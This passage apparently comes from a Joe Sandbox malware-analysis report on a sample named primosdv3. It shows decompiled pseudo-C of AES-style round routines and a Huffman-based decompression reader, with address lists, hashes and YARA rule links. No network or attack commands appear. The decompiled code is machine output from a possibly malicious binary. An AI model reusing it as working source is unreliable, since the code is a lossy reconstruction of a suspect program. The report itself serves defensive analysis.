								if(( *(_t363 + 0x2c) & 0x0000001f) != 0) {
									_t354 =  *(_t363 + 0x14);
								} else {
									_t336 =  *(_t363 + 0x44);
									_t277 = 0;
									 *(_t363 + 0x44) =  *(_t363 + 0x44) & 0;
									_t318 = 1;
									do {
										if( *(_t363 + 0x44 + _t318 * 4) < _t336) {
											_t336 =  *(_t363 + 0x44 + _t318 * 4);
											_t277 = _t318;
										}
										 *(_t363 + 0x44 + _t318 * 4) =  *(_t363 + 0x44 + _t318 * 4) & 0x00000000;
										_t318 = _t318 + 1;
									} while (_t318 < 7);
									_t354 =  *(_t363 + 0x14);
									_t278 = _t277 - 1;
									if(_t278 == 0) {
										if(_t292 >= 0xfffffff0) {
											_t292 = _t292 - 1;
										}
										goto L46;
									}
									_t279 = _t278 - 1;
									if(_t279 == 0) {
										if(_t292 < 0x10) {
											_t292 = _t292 + 1;
										}
										goto L46;
									}
									_t280 = _t279 - 1;
									if(_t280 == 0) {
										if(_t361 >= 0xfffffff0) {
											_t361 = _t361 - 1;
										}
										goto L46;
									}
									_t281 = _t280 - 1;
									if(_t281 == 0) {
										if(_t361 < 0x10) {
											_t361 = _t361 + 1;
										}
										goto L46;
									}
									_t282 = _t281 - 1;
									if(_t282 == 0) {
										if(_t354 < 0xfffffff0) {
											goto L46;
										}
										_t354 = _t354 - 1;
										L34:
										 *(_t363 + 0x14) = _t354;
										goto L46;
									}
									if(_t282 != 1 || _t354 >= 0x10) {
										goto L46;
									} else {
										_t354 = _t354 + 1;
										goto L34;
									}
								}
								L46:
								_t242 =  *(_t363 + 0x38);
								_t316 =  *(_t363 + 0x28) + _t242;
								 *(_t363 + 0x2c) =  *(_t363 + 0x2c) + 1;
								 *(_t363 + 0x28) = _t316;
							} while (_t316 <  *(_t363 + 0x34));
							_t346 =  *(_t363 + 0x3c);
							L49:
							_t346 = _t346 + 1;
							 *(_t363 + 0x3c) = _t346;
						} while (_t346 < _t242);
						goto L95;
					}
				}
				if(_t238 != 1) {
					goto L95;
				}
				_t319 = __ecx[5];
				_t362 = 0;
				_t337 = __ecx[1];
				 *(_t363 + 0x28) = _t319;
				 *(_t363 + 0x2c) = _t319 + _t319;
				if(_t319 > 0x20000 || _t337 > 0x400 || _t337 == 0) {
					goto L96;
				} else {
					_t286 = _t337;
					 *(_t363 + 0x24) = _t337;
					do {
						_t293 = 0;
						_t348 = _t319;
						if(_t319 <  *(_t363 + 0x2c)) {
							_t320 =  *(_t363 + 0x2c);
							goto L12;
							L12:
							_t287 =  *_t349;
							_t293 = _t293 -  *((intOrPtr*)(_t287 + _t362));
							_t362 = _t362 + 1;
							 *((char*)(_t287 + _t348)) = _t293;
							_t348 = _t348 + _t337;
							if(_t348 < _t320) {
								goto L12;
							} else {
								_t319 =  *(_t363 + 0x28);
								_t286 =  *(_t363 + 0x24);
								goto L14;
							}
						}
						L14:
						_t319 = _t319 + 1;
						_t286 = _t286 - 1;
						 *(_t363 + 0x28) = _t319;
						 *(_t363 + 0x24) = _t286;
					} while (_t286 != 0);
					goto L95;
				}
			}

0x00c6c430
0x00c6c433
0x00c6c436
0x00c6c90a
0x00c6c90a
0x00c6c90d
0x00c6c90f
0x00c6c912
0x00c6c91b
0x00c6c979
0x00000000
0x00c6c979
0x00c6c925
0x00c6c927
0x00c6c929
0x00c6c92f
0x00c6c975
0x00000000
0x00000000
0x00000000
0x00000000
0x00c6c931
0x00c6c931
0x00c6c931
0x00c6c933
0x00c6c934
0x00c6c935
0x00c6c939
0x00c6c93f
0x00c6c943
0x00c6c95e
0x00c6c962
0x00c6c962
0x00c6c945
0x00c6c94a
0x00c6c952
0x00c6c952
0x00c6c94a
0x00c6c964
0x00c6c968
0x00c6c96b
0x00c6c96e
0x00c6c96e
0x00c6c971
0x00000000
0x00c6c931
0x00c6c43c
0x00c6c43f
0x00000000
0x00000000
0x00c6c445
0x00c6c448
0x00c6c847
0x00c6c849
0x00c6c852
0x00000000
0x00000000
0x00c6c85b
0x00c6c85e
0x00c6c864
0x00000000
0x00000000
0x00c6c86e
0x00c6c86f
0x00c6c873
0x00c6c876
0x00c6c87c
0x00000000
0x00000000
0x00c6c87e
0x00c6c886
0x00000000
0x00000000
0x00c6c888
0x00c6c88c
0x00c6c88e
0x00c6c893
0x00c6c897
0x00c6c89b
0x00c6c89c
0x00c6c8a3
0x00c6c8a7
0x00c6c8b6
0x00c6c8d1
0x00c6c8d1
0x00c6c8d6
0x00c6c8da
0x00c6c8da
0x00c6c8de
0x00c6c8df
0x00c6c8e2
0x00c6c8e6
0x00c6c8eb
0x00c6c8ef
0x00c6c8f3
0x00c6c8f3
0x00c6c8f6
0x00c6c8f7
0x00c6c8fa
0x00c6c8fe
0x00c6c8fe
0x00000000
0x00c6c908
0x00c6c44e
0x00c6c451
0x00c6c6ee
0x00c6c6f1
0x00c6c6f4
0x00c6c6f8
0x00c6c703
0x00000000
0x00c6c711
0x00c6c711
0x00c6c714
0x00c6c71b
0x00000000
0x00000000
0x00c6c721
0x00c6c723
0x00c6c729
0x00c6c72a
0x00c6c72d
0x00c6c731
0x00c6c735
0x00c6c737
0x00c6c73b
0x00c6c73f
0x00c6c73f
0x00c6c743
0x00000000
0x00000000
0x00c6c749
0x00c6c74d
0x00c6c754
0x00c6c75b
0x00c6c75d
0x00c6c761
0x00c6c765
0x00c6c76f
0x00c6c776
0x00c6c782
0x00c6c797
0x00c6c79b
0x00c6c7a0
0x00c6c7a4
0x00c6c7a7
0x00c6c7ad
0x00c6c7bd
0x00c6c7c3
0x00c6c7c7
0x00c6c7cb
0x00c6c7cd
0x00c6c7cd
0x00c6c7b3
0x00c6c7b3
0x00c6c7b7
0x00c6c7b7
0x00c6c7ad
0x00c6c7d3
0x00c6c7d5
0x00c6c7d6
0x00c6c7da
0x00c6c7dd
0x00c6c7e6
0x00c6c7ec
0x00c6c7ec
0x00c6c7f6
0x00c6c7fa
0x00c6c7fe
0x00c6c804
0x00c6c805
0x00c6c805
0x00c6c806
0x00c6c80a
0x00c6c812
0x00c6c816
0x00c6c81b
0x00000000
0x00000000
0x00c6c826
0x00c6c82d
0x00c6c830
0x00c6c830
0x00c6c833
0x00c6c836
0x00c6c838
0x00c6c83a
0x00c6c83a
0x00000000
0x00c6c83f
0x00c6c703
0x00c6c457
0x00c6c45a
0x00c6c4d6
0x00c6c4d9
0x00c6c4db
0x00c6c4de
0x00c6c4e4
0x00c6c4e8
0x00c6c4ec
0x00c6c4f6
0x00000000
0x00c6c50f
0x00c6c50f
0x00c6c511
0x00c6c517
0x00000000
0x00000000
0x00000000
0x00000000
0x00c6c51d
0x00c6c51d
0x00c6c51d
0x00c6c526
0x00c6c52b
0x00c6c52d
0x00c6c532
0x00c6c534
0x00c6c539
0x00c6c53f
0x00c6c543
0x00c6c548
0x00c6c54c
0x00c6c54f
0x00c6c557
0x00c6c6d8
0x00000000
0x00000000
0x00000000
0x00000000
0x00c6c55d
0x00c6c55d
0x00c6c55d
0x00c6c56b
0x00c6c56f
0x00c6c573
0x00c6c580
0x00c6c583
0x00c6c5a9
0x00c6c5af
0x00c6c5be
0x00c6c5c2
0x00c6c5c6
0x00c6c5cf
0x00c6c5df
0x00c6c5ef
0x00c6c5ff
0x00c6c60f
0x00c6c61d
0x00c6c62a
0x00c6c62e
0x00c6c636
0x00c6c6b2
0x00c6c638
0x00c6c638
0x00c6c63c
0x00c6c63e
0x00c6c644
0x00c6c645
0x00c6c649
0x00c6c64b
0x00c6c64f
0x00c6c64f
0x00c6c651
0x00c6c656
0x00c6c657
0x00c6c65c
0x00c6c660
0x00c6c663
0x00c6c6ad
0x00c6c6af
0x00c6c6af
0x00000000
0x00c6c6ad
0x00c6c665
0x00c6c668
0x00c6c6a5
0x00c6c6a7
0x00c6c6a7
0x00000000
0x00c6c6a5
0x00c6c66a
0x00c6c66d
0x00c6c69d
0x00c6c69f
0x00c6c69f
0x00000000
0x00c6c69d
0x00c6c66f
0x00c6c672
0x00c6c695
0x00c6c697
0x00c6c697
0x00000000
0x00c6c695
0x00c6c674
0x00c6c677
0x00c6c68d
0x00000000
0x00000000
0x00c6c68f
0x00c6c684
0x00c6c684
0x00000000
0x00c6c684
0x00c6c67c
0x00000000
0x00c6c683
0x00c6c683
0x00000000
0x00c6c683
0x00c6c67c
0x00c6c6b6
0x00c6c6ba
0x00c6c6be
0x00c6c6c0
0x00c6c6c4
0x00c6c6c8
0x00c6c6d2
0x00c6c6dc
0x00c6c6dc
0x00c6c6dd
0x00c6c6e1
0x00000000
0x00c6c6e9
0x00c6c4f6
0x00c6c45f
0x00000000
0x00000000
0x00c6c465
0x00c6c468
0x00c6c46a
0x00c6c46d
0x00c6c474
0x00c6c47e
0x00000000
0x00c6c498
0x00c6c498
0x00c6c49a
0x00c6c49e
0x00c6c49e
0x00c6c4a0
0x00c6c4a6
0x00c6c4a8
0x00c6c4a8
0x00c6c4ac
0x00c6c4ac
0x00c6c4ae
0x00c6c4b1
0x00c6c4b2
0x00c6c4b5
0x00c6c4b9
0x00000000
0x00c6c4bb
0x00c6c4bb
0x00c6c4bf
0x00000000
0x00c6c4bf
0x00c6c4b9
0x00c6c4c3
0x00c6c4c3
0x00c6c4c4
0x00c6c4c7
0x00c6c4cb
0x00c6c4cb
0x00000000
0x00c6c49e

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47b9df17d69b107667291e5389cc77a746e331b77a5c5afbb1acb2329f67eb0b
Instruction ID: 69df2010adeaf62dff8009f6b0e0bc842b9dbf16ef36dcaf6cf31fe7e9bf30aa
Opcode Fuzzy Hash: 47b9df17d69b107667291e5389cc77a746e331b77a5c5afbb1acb2329f67eb0b
Instruction Fuzzy Hash: EEF19A71A083018FC728CF29C4C463EBBE5EF9A318F154A2EF4D6D7256D630EA458B56

Uniqueness

Uniqueness Score: -1.00%

Function 00C6E9B7 Relevance: .3, Instructions: 320
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00C6E9B7(void* __ebx, intOrPtr __ecx, void* __esi) {
				void* _t220;
				intOrPtr _t227;
				void* _t250;
				signed char _t252;
				signed int _t300;
				signed int* _t303;
				signed char _t346;
				unsigned int _t348;
				signed int _t351;
				unsigned int _t354;
				signed int* _t357;
				signed int _t361;
				signed int _t366;
				signed int _t370;
				signed int _t374;
				signed char _t376;
				signed int* _t380;
				signed int _t387;
				signed int _t392;
				intOrPtr _t394;
				signed char _t395;
				signed char _t396;
				signed char _t397;
				unsigned int _t399;
				signed int _t402;
				unsigned int _t405;
				unsigned int _t407;
				unsigned int _t408;
				signed int _t409;
				signed int _t414;
				unsigned int _t415;
				unsigned int _t416;
				signed int _t418;
				signed int _t422;
				signed int _t423;
				intOrPtr _t425;
				signed int _t426;
				void* _t430;
				void* _t431;

				_t407 =  *(_t430 + 0x6c);
				_t425 = __ecx;
				 *((intOrPtr*)(_t430 + 0x24)) = __ecx;
				if(_t407 != 0) {
					_t408 = _t407 >> 4;
					 *(_t430 + 0x6c) = _t408;
					if( *((char*)(__ecx)) == 0) {
						 *((intOrPtr*)(_t430 + 0x38)) = __ecx + 8;
						E00C80320(_t430 + 0x5c, __ecx + 8, 0x10);
						_t431 = _t430 + 0xc;
						if(_t408 == 0) {
							L13:
							return E00C80320( *((intOrPtr*)(_t431 + 0x38)), _t431 + 0x58, 0x10);
						}
						_t392 =  *(_t431 + 0x68);
						 *(_t431 + 0x24) = _t392 + 8;
						_t227 =  *((intOrPtr*)(_t431 + 0x78));
						_t394 = _t392 - _t227 - 8;
						 *((intOrPtr*)(_t431 + 0x34)) = _t394;
						_t357 = _t227 + 8;
						 *(_t431 + 0x28) = _t357;
						do {
							_t414 =  *(_t425 + 4);
							 *(_t431 + 0x30) = _t357 + _t394;
							E00C6E985(_t431 + 0x54, _t357 + _t394, (_t414 << 4) + 0x18 + _t425);
							_t395 =  *(_t431 + 0x4c);
							 *(_t431 + 0x10) =  *(0xca61c8 + (_t395 & 0x000000ff) * 4) ^  *(0xca6dc8 + ( *(_t431 + 0x53) & 0x000000ff) * 4) ^  *(0xca69c8 + ( *(_t431 + 0x56) & 0x000000ff) * 4);
							_t346 =  *(_t431 + 0x58);
							_t361 =  *(_t431 + 0x10) ^  *(0xca65c8 + (_t346 & 0x000000ff) * 4);
							 *(_t431 + 0x10) = _t361;
							 *(_t431 + 0x3c) = _t361;
							_t396 =  *(_t431 + 0x50);
							_t366 =  *(0xca65c8 + (_t395 & 0x000000ff) * 4) ^  *(0xca61c8 + (_t396 & 0x000000ff) * 4) ^  *(0xca6dc8 + ( *(_t431 + 0x57) & 0x000000ff) * 4) ^  *(0xca69c8 + ( *(_t431 + 0x5a) & 0x000000ff) * 4);
							 *(_t431 + 0x1c) = _t366;
							 *(_t431 + 0x40) = _t366;
							_t397 =  *(_t431 + 0x54);
							 *(_t431 + 0x14) =  *(0xca69c8 + ( *(_t431 + 0x4e) & 0x000000ff) * 4) ^  *(0xca65c8 + (_t396 & 0x000000ff) * 4);
							_t370 =  *(_t431 + 0x14) ^  *(0xca61c8 + (_t397 & 0x000000ff) * 4) ^  *(0xca6dc8 + ( *(_t431 + 0x5b) & 0x000000ff) * 4);
							 *(_t431 + 0x14) = _t370;
							 *(_t431 + 0x44) = _t370;
							 *(_t431 + 0x18) =  *(0xca6dc8 + ( *(_t431 + 0x4f) & 0x000000ff) * 4) ^  *(0xca69c8 + ( *(_t431 + 0x52) & 0x000000ff) * 4);
							_t374 =  *(_t431 + 0x18) ^  *(0xca65c8 + (_t397 & 0x000000ff) * 4) ^  *(0xca61c8 + (_t346 & 0x000000ff) * 4);
							_t250 = _t414 - 1;
							 *(_t431 + 0x18) = _t374;
							 *(_t431 + 0x48) = _t374;
							if(_t250 <= 1) {
								goto L9;
							}
							_t409 =  *(_t431 + 0x1c);
							_t422 = (_t250 + 2 << 4) + _t425;
							_t426 =  *(_t431 + 0x10);
							 *(_t431 + 0x18) = _t422;
							 *(_t431 + 0x20) = _t250 - 1;
							do {
								_t405 =  *_t422 ^  *(_t431 + 0x14);
								 *(_t431 + 0x10) =  *(_t422 - 8) ^ _t426;
								 *(_t431 + 0x1c) =  *(_t422 + 4) ^ _t374;
								_t354 =  *(_t422 - 4) ^ _t409;
								_t423 =  *(_t431 + 0x1c);
								_t426 =  *(0xca69c8 + (_t405 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xca65c8 + (_t423 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xca6dc8 + (_t354 >> 0x18) * 4) ^  *(0xca61c8 + ( *(_t431 + 0x10) & 0x000000ff) * 4);
								 *(_t431 + 0x3c) = _t426;
								_t409 =  *(0xca69c8 + (_t423 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xca65c8 + ( *(_t431 + 0x10) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xca6dc8 + (_t405 >> 0x18) * 4) ^  *(0xca61c8 + (_t354 & 0x000000ff) * 4);
								 *(_t431 + 0x40) = _t409;
								_t387 =  *(0xca65c8 + (_t354 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xca69c8 + ( *(_t431 + 0x10) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xca6dc8 + (_t423 >> 0x18) * 4) ^  *(0xca61c8 + (_t405 & 0x000000ff) * 4);
								 *(_t431 + 0x14) = _t387;
								 *(_t431 + 0x44) = _t387;
								_t422 =  *(_t431 + 0x18) - 0x10;
								 *(_t431 + 0x18) = _t422;
								_t374 =  *(0xca69c8 + (_t354 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xca65c8 + (_t405 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xca6dc8 + ( *(_t431 + 0x10) >> 0x18) * 4) ^  *(0xca61c8 + (_t423 & 0x000000ff) * 4);
								_t132 = _t431 + 0x20;
								 *_t132 =  *(_t431 + 0x20) - 1;
								 *(_t431 + 0x48) = _t374;
							} while ( *_t132 != 0);
							 *(_t431 + 0x1c) = _t409;
							_t408 =  *(_t431 + 0x74);
							 *(_t431 + 0x10) = _t426;
							_t425 =  *((intOrPtr*)(_t431 + 0x2c));
							 *(_t431 + 0x18) = _t374;
							L9:
							_t252 =  *(_t425 + 0x28) ^  *(_t431 + 0x10);
							 *(_t431 + 0x20) = _t252;
							 *(_t431 + 0x4c) = _t252;
							_t376 =  *(_t425 + 0x34) ^  *(_t431 + 0x18);
							 *(_t431 + 0x3c) =  *((intOrPtr*)((_t252 & 0x000000ff) + 0xca50c8));
							_t399 =  *(_t425 + 0x30) ^  *(_t431 + 0x14);
							_t348 =  *(_t425 + 0x2c) ^  *(_t431 + 0x1c);
							 *((char*)(_t431 + 0x3d)) =  *((intOrPtr*)((_t376 >> 0x00000008 & 0x000000ff) + 0xca50c8));
							_t415 =  *(_t431 + 0x20);
							 *(_t431 + 0x54) = _t399;
							 *(_t431 + 0x50) = _t348;
							 *((char*)(_t431 + 0x3e)) =  *((intOrPtr*)((_t399 >> 0x00000010 & 0x000000ff) + 0xca50c8));
							 *(_t431 + 0x58) = _t376;
							 *((char*)(_t431 + 0x3f)) =  *((intOrPtr*)((_t348 >> 0x18) + 0xca50c8));
							 *(_t431 + 0x40) =  *((intOrPtr*)((_t348 & 0x000000ff) + 0xca50c8));
							 *((char*)(_t431 + 0x41)) =  *((intOrPtr*)((_t415 >> 0x00000008 & 0x000000ff) + 0xca50c8));
							 *((char*)(_t431 + 0x42)) =  *((intOrPtr*)((_t376 >> 0x00000010 & 0x000000ff) + 0xca50c8));
							 *((char*)(_t431 + 0x43)) =  *((intOrPtr*)((_t399 >> 0x18) + 0xca50c8));
							 *(_t431 + 0x44) =  *((intOrPtr*)((_t399 & 0x000000ff) + 0xca50c8));
							 *((char*)(_t431 + 0x45)) =  *((intOrPtr*)((_t348 >> 0x00000008 & 0x000000ff) + 0xca50c8));
							_t416 = _t415 >> 0x18;
							 *((char*)(_t431 + 0x46)) =  *((intOrPtr*)((_t415 >> 0x00000010 & 0x000000ff) + 0xca50c8));
							 *((char*)(_t431 + 0x47)) =  *((intOrPtr*)((_t376 >> 0x18) + 0xca50c8));
							 *(_t431 + 0x48) =  *((intOrPtr*)((_t376 & 0x000000ff) + 0xca50c8));
							_t402 =  *(_t425 + 0x18) ^  *(_t431 + 0x3c);
							 *((char*)(_t431 + 0x49)) =  *((intOrPtr*)((_t399 >> 0x00000008 & 0x000000ff) + 0xca50c8));
							 *((char*)(_t431 + 0x4a)) =  *((intOrPtr*)((_t348 >> 0x00000010 & 0x000000ff) + 0xca50c8));
							_t186 = _t416 + 0xca50c8; // 0x30d56a09
							 *((char*)(_t431 + 0x4b)) =  *_t186;
							_t300 =  *(_t425 + 0x24) ^  *(_t431 + 0x48);
							_t418 =  *(_t425 + 0x1c) ^  *(_t431 + 0x40);
							_t351 =  *(_t425 + 0x20) ^  *(_t431 + 0x44);
							 *(_t431 + 0x20) = _t300;
							if( *((char*)(_t425 + 1)) != 0) {
								_t402 = _t402 ^  *(_t431 + 0x5c);
								_t418 = _t418 ^  *(_t431 + 0x60);
								_t351 = _t351 ^  *(_t431 + 0x64);
								 *(_t431 + 0x20) = _t300 ^  *(_t431 + 0x68);
							}
							 *(_t431 + 0x5c) =  *( *(_t431 + 0x30));
							_t303 =  *(_t431 + 0x24);
							 *(_t431 + 0x60) =  *(_t303 - 4);
							 *(_t431 + 0x64) =  *_t303;
							 *(_t431 + 0x68) = _t303[1];
							_t380 =  *(_t431 + 0x28);
							 *(_t431 + 0x24) =  &(_t303[4]);
							 *(_t380 - 8) = _t402;
							_t380[1] =  *(_t431 + 0x20);
							_t394 =  *((intOrPtr*)(_t431 + 0x34));
							 *(_t380 - 4) = _t418;
							 *_t380 = _t351;
							_t357 =  &(_t380[4]);
							_t408 = _t408 - 1;
							 *(_t431 + 0x28) = _t357;
							 *(_t431 + 0x74) = _t408;
						} while (_t408 != 0);
						goto L13;
					}
					return E00C6EE7A( *((intOrPtr*)(_t430 + 0x70)), _t408,  *((intOrPtr*)(_t430 + 0x70)));
				}
				return _t220;
			}

0x00c6e9bc
0x00c6e9c0
0x00c6e9c2
0x00c6e9c8
0x00c6e9ce
0x00c6e9d5
0x00c6e9d9
0x00c6e9f4
0x00c6e9fd
0x00c6ea02
0x00c6ea07
0x00c6ee5f
0x00000000
0x00c6ee6f
0x00c6ea0d
0x00c6ea16
0x00c6ea1a
0x00c6ea20
0x00c6ea23
0x00c6ea27
0x00c6ea2a
0x00c6ea2e
0x00c6ea2e
0x00c6ea35
0x00c6ea48
0x00c6ea4d
0x00c6ea73
0x00c6ea77
0x00c6ea82
0x00c6ea89
0x00c6ea8d
0x00c6ea94
0x00c6eaba
0x00c6eac6
0x00c6eaca
0x00c6ead8
0x00c6eae3
0x00c6eafa
0x00c6eb06
0x00c6eb0a
0x00c6eb21
0x00c6eb36
0x00c6eb3d
0x00c6eb40
0x00c6eb44
0x00c6eb4b
0x00000000
0x00000000
0x00c6eb51
0x00c6eb5b
0x00c6eb5d
0x00c6eb62
0x00c6eb66
0x00c6eb6a
0x00c6eb71
0x00c6eb75
0x00c6eb81
0x00c6eb85
0x00c6eb87
0x00c6ebbc
0x00c6ebdc
0x00c6ebf6
0x00c6ec19
0x00c6ec36
0x00c6ec3d
0x00c6ec41
0x00c6ec70
0x00c6ec73
0x00c6ec77
0x00c6ec7e
0x00c6ec7e
0x00c6ec83
0x00c6ec83
0x00c6ec8d
0x00c6ec91
0x00c6ec95
0x00c6ec99
0x00c6ec9d
0x00c6eca1
0x00c6eca4
0x00c6eca8
0x00c6ecac
0x00c6ecb6
0x00c6ecc3
0x00c6eccf
0x00c6ecd6
0x00c6ece0
0x00c6ecec
0x00c6ecf0
0x00c6ecf4
0x00c6ecfe
0x00c6ed07
0x00c6ed11
0x00c6ed1e
0x00c6ed30
0x00c6ed42
0x00c6ed51
0x00c6ed61
0x00c6ed76
0x00c6ed82
0x00c6ed8b
0x00c6ed9a
0x00c6eda7
0x00c6edb1
0x00c6edbb
0x00c6edc8
0x00c6edcc
0x00c6edd2
0x00c6eddf
0x00c6ede3
0x00c6ede7
0x00c6edef
0x00c6edf3
0x00c6edf5
0x00c6edf9
0x00c6edfd
0x00c6ee05
0x00c6ee05
0x00c6ee0f
0x00c6ee13
0x00c6ee1a
0x00c6ee20
0x00c6ee2a
0x00c6ee2e
0x00c6ee32
0x00c6ee36
0x00c6ee3d
0x00c6ee40
0x00c6ee44
0x00c6ee47
0x00c6ee49
0x00c6ee4c
0x00c6ee4f
0x00c6ee53
0x00c6ee53
0x00000000
0x00c6ee5e
0x00000000
0x00c6e9e4
0x00c6ee77

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 860bab1e2991b59f329504ae42d81c921b7d003eabab1d8dbcf2dc7a74e7cf6f
Instruction ID: 5ffc180d48e57dcb4c43cf349602860fdc56edbc1ecceff87525c44a31a1f37e
Opcode Fuzzy Hash: 860bab1e2991b59f329504ae42d81c921b7d003eabab1d8dbcf2dc7a74e7cf6f
Instruction Fuzzy Hash: 5EE137755083908FC344CF29D88096BBFF0AF9A308F49495EF9D497352C235EA19DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C74088 Relevance: .3, Instructions: 270
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E00C74088(void* __ecx, void* __edx) {
				void* __edi;
				signed int _t82;
				signed int _t87;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				void* _t99;
				void* _t101;
				void* _t121;
				signed int _t130;
				signed int _t139;
				signed int _t140;
				signed int _t149;
				signed int _t151;
				void* _t153;
				signed int _t156;
				signed int _t157;
				intOrPtr* _t158;
				intOrPtr* _t167;
				signed int _t170;
				void* _t171;
				signed int _t174;
				void* _t179;
				unsigned int _t181;
				void* _t184;
				signed int _t185;
				intOrPtr* _t186;
				void* _t187;
				signed int _t188;
				signed int _t189;
				intOrPtr* _t190;
				signed int _t193;
				signed int _t198;
				void* _t201;

				_t179 = __edx;
				_t187 = __ecx;
				_t186 = __ecx + 4;
				if( *_t186 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19 || E00C74DC4(__ecx) != 0) {
					E00C6A881(_t186,  ~( *(_t187 + 8)) & 0x00000007);
					_t82 = E00C6A898(_t186);
					_t205 = _t82 & 0x00008000;
					if((_t82 & 0x00008000) == 0) {
						_t139 = 0;
						 *((intOrPtr*)(_t187 + 0xe65c)) = 0;
						 *((intOrPtr*)(_t187 + 0x98d0)) = 0;
						 *((intOrPtr*)(_t187 + 0x98d4)) = 0;
						__eflags = _t82 & 0x00004000;
						if((_t82 & 0x00004000) == 0) {
							E00C7FFF0(_t186, _t187 + 0xe4c8, 0, 0x194);
							_t201 = _t201 + 0xc;
						}
						E00C6A881(_t186, 2);
						do {
							 *(_t201 + 0x14) = E00C6A898(_t186) >> 0xc;
							E00C6A881(_t186, 4);
							_t87 =  *(_t201 + 0x10);
							__eflags = _t87 - 0xf;
							if(_t87 != 0xf) {
								 *(_t201 + _t139 + 0x14) = _t87;
								goto L15;
							}
							_t188 = E00C6A898(_t186) >> 0x0000000c & 0x000000ff;
							E00C6A881(_t186, 4);
							__eflags = _t188;
							if(_t188 != 0) {
								_t189 = _t188 + 2;
								__eflags = _t189;
								while(1) {
									_t189 = _t189 - 1;
									__eflags = _t139 - 0x14;
									if(_t139 >= 0x14) {
										break;
									}
									 *(_t201 + _t139 + 0x14) = 0;
									_t139 = _t139 + 1;
									__eflags = _t189;
									if(_t189 != 0) {
										continue;
									}
									break;
								}
								_t139 = _t139 - 1;
								goto L15;
							}
							 *(_t201 + _t139 + 0x14) = 0xf;
							L15:
							_t139 = _t139 + 1;
							__eflags = _t139 - 0x14;
						} while (_t139 < 0x14);
						_push(0x14);
						_t190 = _t187 + 0x3c50;
						_push(_t190);
						_push(_t201 + 0x1c);
						E00C73797();
						_t140 = 0;
						__eflags = 0;
						do {
							__eflags =  *_t186 -  *((intOrPtr*)(_t187 + 0x84)) - 5;
							if( *_t186 <=  *((intOrPtr*)(_t187 + 0x84)) - 5) {
								L19:
								_t92 = E00C6A89D(_t186);
								_t93 =  *(_t190 + 0x84);
								_t181 = _t92 & 0x0000fffe;
								__eflags = _t181 -  *((intOrPtr*)(_t190 + 4 + _t93 * 4));
								if(_t181 >=  *((intOrPtr*)(_t190 + 4 + _t93 * 4))) {
									_t149 = 0xf;
									_t94 = _t93 + 1;
									 *(_t201 + 0x10) = _t149;
									__eflags = _t94 - _t149;
									if(_t94 >= _t149) {
										L27:
										_t151 =  *(_t186 + 4) +  *(_t201 + 0x10);
										 *_t186 =  *_t186 + (_t151 >> 3);
										_t97 =  *(_t201 + 0x10);
										 *(_t186 + 4) = _t151 & 0x00000007;
										_t153 = 0x10;
										_t156 =  *((intOrPtr*)(_t190 + 0x44 + _t97 * 4)) + (_t181 -  *((intOrPtr*)(_t190 + _t97 * 4)) >> _t153 - _t97);
										__eflags = _t156 -  *_t190;
										asm("sbb eax, eax");
										_t98 = _t97 & _t156;
										__eflags = _t98;
										_t157 =  *(_t190 + 0xc88 + _t98 * 2) & 0x0000ffff;
										L28:
										_t184 = 0x10;
										__eflags = _t157 - _t184;
										if(_t157 >= _t184) {
											_t99 = 0x12;
											__eflags = _t157 - _t99;
											if(__eflags >= 0) {
												_t158 = _t186;
												if(__eflags != 0) {
													_t193 = (E00C6A898(_t158) >> 9) + 0xb;
													__eflags = _t193;
													_push(7);
												} else {
													_t193 = (E00C6A898(_t158) >> 0xd) + 3;
													_push(3);
												}
												_pop(_t101);
												E00C6A881(_t186, _t101);
												while(1) {
													_t193 = _t193 - 1;
													__eflags = _t140 - 0x194;
													if(_t140 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t140 + 0x28) = 0;
													_t140 = _t140 + 1;
													__eflags = _t193;
													if(_t193 != 0) {
														continue;
													}
													L44:
													_t190 = _t187 + 0x3c50;
													goto L45;
												}
												break;
											}
